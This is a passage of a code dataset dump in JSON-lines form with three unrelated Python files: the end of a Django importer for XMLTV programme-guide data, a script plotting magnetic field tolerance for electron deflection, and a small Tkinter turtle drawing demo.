'length':\n units = child.get('units')\n if units == 'seconds':\n P.length = int(child.text)\n elif units == 'minutes':\n P.length = int(child.text) * 60\n elif units == 'hours':\n P.length = int(child.text) * 3600\n elif child.tag == 'credits':\n for grand_child in child.iterchildren():\n if grand_child.tag == 'actor':\n obj, created = Actor.objects.get_or_create(\n name=grand_child.text,\n role=grand_child.get('role'))\n P.actors.add(obj)\n elif grand_child.tag == 'director':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.directors.add(obj)\n elif grand_child.tag == 'writer':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.writers.add(obj)\n elif grand_child.tag == 'adapter':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.adapters.add(obj)\n elif grand_child.tag == 'producer':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.producers.add(obj)\n elif grand_child.tag == 'composer':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.composers.add(obj)\n elif grand_child.tag == 'editor':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.editors.add(obj)\n elif grand_child.tag == 'presenter':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.presenters.add(obj)\n elif grand_child.tag == 'commentator':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n 
P.commentators.add(obj)\n                        elif grand_child.tag == 'guest':\n                            obj, created = Staff.objects.get_or_create(\n                                name=grand_child.text)\n                            P.guests.add(obj)\n\n                P.save()\n\n                #self.serialize(P)\n\n                elem.clear()\n                # Also eliminate now-empty references\n                # from the root node to <Title>\n                while elem.getprevious() is not None:\n                    del elem.getparent()[0]\n\n                imported += 1\n                if imported % 100 == 0:\n                    nant = imported - nant\n                    #db.transaction.autocommit()\n                    db.transaction.commit()\n                    db.reset_queries()\n                    delta = datetime.now() - import_ant\n                    vel = nant / delta.total_seconds()\n                    percent = (imported / self.total_programme) * 100\n                    log.info('Imported %d/%d (%.2g) vel=%d i/s', imported,\n                             self.total_programme, percent, vel)\n                    nant = imported\n                    import_ant = datetime.now()\n                if limit > 0 and imported >= limit:\n                    break\n        except Exception as e:\n            log.error('Error:%s', e)\n        db.transaction.commit()\n        db.reset_queries()\n\n    #@transaction.commit_on_success\n    def import_to_db(self):\n        log = logging.getLogger('epg_import')\n        zip = zipfile.ZipFile(\n            '%s/%dfull.zip' % (os.path.join(settings.MEDIA_ROOT, 'epg'),\n                               self.xmltv_source.pk), \"w\", zipfile.ZIP_DEFLATED)\n\n        # create temp dir\n        self.tempdir = tempfile.mkdtemp()\n\n        # init dict with file handlers and\n        self.dump_data = {'file_handlers': {}, 'object_ids': {}}\n\n        #self.grab_info()\n\n        #epg_source = self.xmltv_source.epg_source_ptr\n\n        # Import <channel> elements\n        self.import_channel_elements()\n        # Import <programme> elements\n        self.import_programme_elements(limit=0)\n        # count elements\n        #epg_source.numberofElements = \\\n        #    Programme.objects.filter(source=epg_source).count() + \\\n        #    Channel.objects.filter(source=epg_source).count()\n        # Update importedElements\n        #epg_source.importedElements = self.xmltv_source.numberofElements\n        # save changes\n        #epg_source.save()\n        #self.xmltv_source.save()\n\n        #self.serialize(epg_source)\n\n        for k, v in self.dump_data['file_handlers'].items():\n            log.info('Writing %d %s objects' % (\n                len(self.dump_data['object_ids'][k]), k))\n            v.flush()\n            v.close()\n\n            file = open(v.name, 'r+')\n\n            # edit file\n            data = file.read()\n            output = re.sub(r'^\\]\\[$', r',', data, flags=re.MULTILINE)\n            file.seek(0)\n            file.truncate(0)\n            file.write(output)\n            file.flush()\n\n            zip.write(file.name, os.path.basename(file.name))\n            file.close()\n        zip.close()\n        # remove temp dir\n        shutil.rmtree(self.tempdir)\n        ## Rebuild linked list\n        sql_linked_list = \"update epg_guide g set \\\nprevious_id = (\\\nselect o.id from epg_guide o where o.start < g.start AND \\\no.channel_id = g.channel_id order by o.start desc limit 1\\\n),\\\nnext_id = (\\\nselect o.id from epg_guide o where o.start > g.start AND \\\no.channel_id = g.channel_id order by o.start asc limit 1\\\n);\\\n\"\n        #from django.db import connection\n        #cursor = connection.cursor()\n        #cursor.execute(sql_linked_list)\n\n\ndef get_info_from_epg_source(epg_source):\n\n    # Update Epg_Source fields\n    numberofElements = 0\n    file_list = Zip_to_XML(epg_source.filefield.path)\n    for f in file_list.get_all_files():\n        importer = XML_Epg_Importer(f, epg_source=epg_source)\n        numberofElements += importer.get_number_of_elements()\n        # Retrieve maximum stop time and minimum start time\n        if (epg_source.minor_start != None) and (epg_source.major_stop != None):\n            minor_start, major_stop = importer.get_period_of_the_file()\n            if (epg_source.minor_start > minor_start):\n                epg_source.minor_start = minor_start\n            if (epg_source.major_stop < major_stop):\n                epg_source.major_stop = major_stop\n        else:\n            epg_source.minor_start, epg_source.major_stop = \\\n                importer.get_period_of_the_file()\n\n    # Update Epg_Source fields\n    epg_source.numberofElements = numberofElements\n    epg_source.importedElements = 0\n    info = importer.get_xml_info()\n    epg_source.source_info_url = info['source_info_url']\n    epg_source.source_info_name = info['source_info_name']\n    epg_source.source_data_url = info['source_data_url']\n    epg_source.generator_info_name = info['generator_info_name']\n    epg_source.generator_info_url = info['generator_info_url']\n\n    epg_source.save()\n\n\ndef diff_epg_dumps(input1, input2):\n    \"diff 2 zip files containing json object dumps\"\n    # create tempdir and output zip file\n    tempdir = tempfile.mkdtemp()\n    zip = zipfile.ZipFile('%sdiff.zip' % input2[:-8],\n                          \"w\", zipfile.ZIP_DEFLATED)\n    # open input zip files\n    z1 = zipfile.ZipFile(input1, 'r')\n    z2 = zipfile.ZipFile(input2, 'r')\n\n    p = re.compile(r'^,$', re.MULTILINE)\n    for file in z2.namelist():\n        f2 = z2.open(file)\n        try:\n            f1 = z1.open(file)\n        except KeyError:\n            zip.writestr(file, f2.read())\n            f2.close()\n            continue\n        lines1 = f1.read()\n        lines2 = f2.read()\n        set1 = set(filter(None, p.split(lines1[1:-2])))\n        set2 = set(filter(None, p.split(lines2[1:-2])))\n        diff = list(set2 - set1)\n        out = open(os.path.join(tempdir, f2.name), 'w')\n        out.write('[')\n        out.writelines(','.join(diff))\n        out.write(']\\n')\n        out.close()\n        f1.close()\n        f2.close()\n        zip.write(out.name, os.path.basename(out.name))\n    # cleanups\n    zip.close()\n    shutil.rmtree(tempdir)\n","sub_path":"epg/data_importer.py","file_name":"data_importer.py","file_ext":"py","file_size_in_byte":25463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"268745826","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef tol_b(dis, dev, energy):\n    \"\"\"\n    Calculate tolerance of magnetic field for desired deviation requirement.\n    :param dis: distance from condenser optics to APS entrance.\n    :param dev: required deviation of electron traces at APS entrance.\n    :param energy: electron energy in eV at entrance.\n    :return: b tolerance in Gauss\n    \"\"\"\n    m = 9.1e-31\n    c = 1.6e-19\n    v = (2 * energy * c / m) ** 0.5\n    b_tol = []\n    for j in dis:\n        deflect_radius = (j ** 2) / (2 * dev)\n        result = (m * v * 1e4) / (c * deflect_radius)\n        b_tol.append(result)\n    return b_tol\n\n\ndef main():\n    e_energy = 5000\n    dis = np.arange(1e-4, 1e-3, 1e-5)\n    dev = [1e-7, 2e-7, 3e-7, 5e-7, 8e-7, 1e-6]\n    b_tol = {}\n    for i in dev:\n        b_tol[i] = tol_b(dis, i, e_energy)\n        plt.plot(dis, b_tol[i])\n    plt.xlabel('dist_gun_to_aps (m)')\n    plt.ylabel('b_tolerance (gauss)')\n    plt.title('b_tolerance_with_required_deviation_at_aps_entrance')\n    plt.text(4e-4, 300, 'Up to bot: more strict dev requirement')\n    plt.show()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Day16-20/code/par_deflect.py","file_name":"par_deflect.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"107428574","text":"# hello.py\n\nfrom sys import *\nfrom Tkinter import HIDDEN, NORMAL, Tk, Canvas\nimport turtle\nimport mod.data as me\n\n\nprint(version_info)\nme.hello()\na = me.info(\"JAeHO\")\na.hello()\n\nroot = Tk()\nc = Canvas(root, width=500, height = 400)\nc.configure(bg='dark green', highlightthickness=0)\nc.pack()\n\n\npainter = turtle.RawTurtle(c)\npainter.pencolor(\"blue\")\nfor i in range(10):\n    painter.forward(10)\n    painter.left(123) # Let's go counterclockwise this time \n    \npainter.pencolor(\"red\")\nfor i in range(10):\n    painter.forward(100)\n    painter.left(123)\n\nroot.mainloop()\n\n\n","sub_path":"numpy/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}